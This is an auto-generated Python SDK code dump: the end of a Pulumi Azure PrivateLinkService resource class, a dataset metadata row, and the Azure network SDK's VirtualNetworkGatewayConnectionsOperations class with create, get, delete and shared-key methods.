def ip_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PrivateLinkServiceIpConfigurationArgs']]]]:
"""
An array of private link service IP configurations.
"""
return pulumi.get(self, "ip_configurations")
@ip_configurations.setter
def ip_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PrivateLinkServiceIpConfigurationArgs']]]]):
pulumi.set(self, "ip_configurations", value)
@property
@pulumi.getter(name="loadBalancerFrontendIpConfigurations")
def load_balancer_frontend_ip_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FrontendIPConfigurationArgs']]]]:
"""
An array of references to the load balancer IP configurations.
"""
return pulumi.get(self, "load_balancer_frontend_ip_configurations")
@load_balancer_frontend_ip_configurations.setter
def load_balancer_frontend_ip_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['FrontendIPConfigurationArgs']]]]):
pulumi.set(self, "load_balancer_frontend_ip_configurations", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="serviceName")
def service_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the private link service.
"""
return pulumi.get(self, "service_name")
@service_name.setter
def service_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def visibility(self) -> Optional[pulumi.Input['PrivateLinkServicePropertiesVisibilityArgs']]:
"""
The visibility list of the private link service.
"""
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: Optional[pulumi.Input['PrivateLinkServicePropertiesVisibilityArgs']]):
pulumi.set(self, "visibility", value)
class PrivateLinkService(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_approval: Optional[pulumi.Input[pulumi.InputType['PrivateLinkServicePropertiesAutoApprovalArgs']]] = None,
enable_proxy_protocol: Optional[pulumi.Input[bool]] = None,
extended_location: Optional[pulumi.Input[pulumi.InputType['ExtendedLocationArgs']]] = None,
fqdns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PrivateLinkServiceIpConfigurationArgs']]]]] = None,
load_balancer_frontend_ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
service_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
visibility: Optional[pulumi.Input[pulumi.InputType['PrivateLinkServicePropertiesVisibilityArgs']]] = None,
__props__=None):
"""
Private link service resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PrivateLinkServicePropertiesAutoApprovalArgs']] auto_approval: The auto-approval list of the private link service.
:param pulumi.Input[bool] enable_proxy_protocol: Whether the private link service is enabled for proxy protocol or not.
:param pulumi.Input[pulumi.InputType['ExtendedLocationArgs']] extended_location: The extended location of the load balancer.
:param pulumi.Input[Sequence[pulumi.Input[str]]] fqdns: The list of Fqdn.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PrivateLinkServiceIpConfigurationArgs']]]] ip_configurations: An array of private link service IP configurations.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]]] load_balancer_frontend_ip_configurations: An array of references to the load balancer IP configurations.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] service_name: The name of the private link service.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[pulumi.InputType['PrivateLinkServicePropertiesVisibilityArgs']] visibility: The visibility list of the private link service.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PrivateLinkServiceInitArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Private link service resource.
:param str resource_name: The name of the resource.
:param PrivateLinkServiceInitArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PrivateLinkServiceInitArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_approval: Optional[pulumi.Input[pulumi.InputType['PrivateLinkServicePropertiesAutoApprovalArgs']]] = None,
enable_proxy_protocol: Optional[pulumi.Input[bool]] = None,
extended_location: Optional[pulumi.Input[pulumi.InputType['ExtendedLocationArgs']]] = None,
fqdns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PrivateLinkServiceIpConfigurationArgs']]]]] = None,
load_balancer_frontend_ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
service_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
visibility: Optional[pulumi.Input[pulumi.InputType['PrivateLinkServicePropertiesVisibilityArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PrivateLinkServiceInitArgs.__new__(PrivateLinkServiceInitArgs)
__props__.__dict__["auto_approval"] = auto_approval
__props__.__dict__["enable_proxy_protocol"] = enable_proxy_protocol
__props__.__dict__["extended_location"] = extended_location
__props__.__dict__["fqdns"] = fqdns
__props__.__dict__["id"] = id
__props__.__dict__["ip_configurations"] = ip_configurations
__props__.__dict__["load_balancer_frontend_ip_configurations"] = load_balancer_frontend_ip_configurations
__props__.__dict__["location"] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["service_name"] = service_name
__props__.__dict__["tags"] = tags
__props__.__dict__["visibility"] = visibility
__props__.__dict__["alias"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["network_interfaces"] = None
__props__.__dict__["private_endpoint_connections"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20210201:PrivateLinkService"), pulumi.Alias(type_="azure-native:network:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20190401:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20190401:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20190601:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20190601:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20190701:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20190701:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20190801:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20190801:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20190901:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20190901:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20191101:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20191101:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20191201:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20191201:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20200301:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20200301:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20200401:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20200401:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20200501:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20200501:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20200601:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20200601:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20200701:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20200701:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20200801:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20200801:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20201101:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20201101:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20210301:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20210301:PrivateLinkService")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(PrivateLinkService, __self__).__init__(
'azure-native:network/v20210201:PrivateLinkService',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'PrivateLinkService':
"""
Get an existing PrivateLinkService resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = PrivateLinkServiceInitArgs.__new__(PrivateLinkServiceInitArgs)
__props__.__dict__["alias"] = None
__props__.__dict__["auto_approval"] = None
__props__.__dict__["enable_proxy_protocol"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["extended_location"] = None
__props__.__dict__["fqdns"] = None
__props__.__dict__["ip_configurations"] = None
__props__.__dict__["load_balancer_frontend_ip_configurations"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["network_interfaces"] = None
__props__.__dict__["private_endpoint_connections"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["visibility"] = None
return PrivateLinkService(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def alias(self) -> pulumi.Output[str]:
"""
The alias of the private link service.
"""
return pulumi.get(self, "alias")
@property
@pulumi.getter(name="autoApproval")
def auto_approval(self) -> pulumi.Output[Optional['outputs.PrivateLinkServicePropertiesResponseAutoApproval']]:
"""
The auto-approval list of the private link service.
"""
return pulumi.get(self, "auto_approval")
@property
@pulumi.getter(name="enableProxyProtocol")
def enable_proxy_protocol(self) -> pulumi.Output[Optional[bool]]:
"""
Whether the private link service is enabled for proxy protocol or not.
"""
return pulumi.get(self, "enable_proxy_protocol")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="extendedLocation")
def extended_location(self) -> pulumi.Output[Optional['outputs.ExtendedLocationResponse']]:
"""
The extended location of the load balancer.
"""
return pulumi.get(self, "extended_location")
@property
@pulumi.getter
def fqdns(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The list of Fqdn.
"""
return pulumi.get(self, "fqdns")
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> pulumi.Output[Optional[Sequence['outputs.PrivateLinkServiceIpConfigurationResponse']]]:
"""
An array of private link service IP configurations.
"""
return pulumi.get(self, "ip_configurations")
@property
@pulumi.getter(name="loadBalancerFrontendIpConfigurations")
def load_balancer_frontend_ip_configurations(self) -> pulumi.Output[Optional[Sequence['outputs.FrontendIPConfigurationResponse']]]:
"""
An array of references to the load balancer IP configurations.
"""
return pulumi.get(self, "load_balancer_frontend_ip_configurations")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkInterfaces")
def network_interfaces(self) -> pulumi.Output[Sequence['outputs.NetworkInterfaceResponse']]:
"""
An array of references to the network interfaces created for this private link service.
"""
return pulumi.get(self, "network_interfaces")
@property
@pulumi.getter(name="privateEndpointConnections")
def private_endpoint_connections(self) -> pulumi.Output[Sequence['outputs.PrivateEndpointConnectionResponse']]:
"""
An array of list about connections to the private endpoint.
"""
return pulumi.get(self, "private_endpoint_connections")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the private link service resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def visibility(self) -> pulumi.Output[Optional['outputs.PrivateLinkServicePropertiesResponseVisibility']]:
"""
The visibility list of the private link service.
"""
return pulumi.get(self, "visibility")
| 50.846939 | 2,459 | 0.686334 |
4a1b3d73b1dc60069fe6570205380e364bfbe5cf
| 32,048 |
py
|
Python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2017_08_01/operations/_virtual_network_gateway_connections_operations.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 1 |
2021-06-02T08:01:35.000Z
|
2021-06-02T08:01:35.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2017_08_01/operations/_virtual_network_gateway_connections_operations.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 226 |
2019-07-24T07:57:21.000Z
|
2019-10-15T01:07:24.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2017_08_01/operations/_virtual_network_gateway_connections_operations.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class VirtualNetworkGatewayConnectionsOperations(object):
"""VirtualNetworkGatewayConnectionsOperations operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2017-08-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-08-01"
self.config = config
def _create_or_update_initial(
self, resource_group_name, virtual_network_gateway_connection_name, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayConnectionName': self._serialize.url("virtual_network_gateway_connection_name", virtual_network_gateway_connection_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'VirtualNetworkGatewayConnection')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetworkGatewayConnection', response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualNetworkGatewayConnection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, virtual_network_gateway_connection_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates or updates a virtual network gateway connection in the
specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_gateway_connection_name: The name of the
virtual network gateway connection.
:type virtual_network_gateway_connection_name: str
:param parameters: Parameters supplied to the create or update virtual
network gateway connection operation.
:type parameters:
~azure.mgmt.network.v2017_08_01.models.VirtualNetworkGatewayConnection
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns
VirtualNetworkGatewayConnection or
ClientRawResponse<VirtualNetworkGatewayConnection> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_08_01.models.VirtualNetworkGatewayConnection]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_08_01.models.VirtualNetworkGatewayConnection]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('VirtualNetworkGatewayConnection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections/{virtualNetworkGatewayConnectionName}'}
def get(
self, resource_group_name, virtual_network_gateway_connection_name, custom_headers=None, raw=False, **operation_config):
"""Gets the specified virtual network gateway connection by resource
group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_gateway_connection_name: The name of the
virtual network gateway connection.
:type virtual_network_gateway_connection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: VirtualNetworkGatewayConnection or ClientRawResponse if
raw=true
:rtype:
~azure.mgmt.network.v2017_08_01.models.VirtualNetworkGatewayConnection
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayConnectionName': self._serialize.url("virtual_network_gateway_connection_name", virtual_network_gateway_connection_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetworkGatewayConnection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections/{virtualNetworkGatewayConnectionName}'}
def _delete_initial(
self, resource_group_name, virtual_network_gateway_connection_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayConnectionName': self._serialize.url("virtual_network_gateway_connection_name", virtual_network_gateway_connection_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, virtual_network_gateway_connection_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes the specified virtual network Gateway connection.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_gateway_connection_name: The name of the
virtual network gateway connection.
:type virtual_network_gateway_connection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections/{virtualNetworkGatewayConnectionName}'}
def _set_shared_key_initial(
self, resource_group_name, virtual_network_gateway_connection_name, value, custom_headers=None, raw=False, **operation_config):
parameters = models.ConnectionSharedKey(value=value)
# Construct URL
url = self.set_shared_key.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayConnectionName': self._serialize.url("virtual_network_gateway_connection_name", virtual_network_gateway_connection_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'ConnectionSharedKey')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectionSharedKey', response)
if response.status_code == 201:
deserialized = self._deserialize('ConnectionSharedKey', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def set_shared_key(
self, resource_group_name, virtual_network_gateway_connection_name, value, custom_headers=None, raw=False, polling=True, **operation_config):
"""The Put VirtualNetworkGatewayConnectionSharedKey operation sets the
virtual network gateway connection shared key for passed virtual
network gateway connection in the specified resource group through
Network resource provider.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_gateway_connection_name: The virtual network
gateway connection name.
:type virtual_network_gateway_connection_name: str
:param value: The virtual network connection shared key value.
:type value: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns ConnectionSharedKey or
ClientRawResponse<ConnectionSharedKey> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_08_01.models.ConnectionSharedKey]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_08_01.models.ConnectionSharedKey]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._set_shared_key_initial(
resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name,
value=value,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('ConnectionSharedKey', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
set_shared_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections/{virtualNetworkGatewayConnectionName}/sharedkey'}
def get_shared_key(
self, resource_group_name, virtual_network_gateway_connection_name, custom_headers=None, raw=False, **operation_config):
"""The Get VirtualNetworkGatewayConnectionSharedKey operation retrieves
information about the specified virtual network gateway connection
shared key through Network resource provider.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_gateway_connection_name: The virtual network
gateway connection shared key name.
:type virtual_network_gateway_connection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ConnectionSharedKey or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2017_08_01.models.ConnectionSharedKey or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_shared_key.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayConnectionName': self._serialize.url("virtual_network_gateway_connection_name", virtual_network_gateway_connection_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectionSharedKey', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
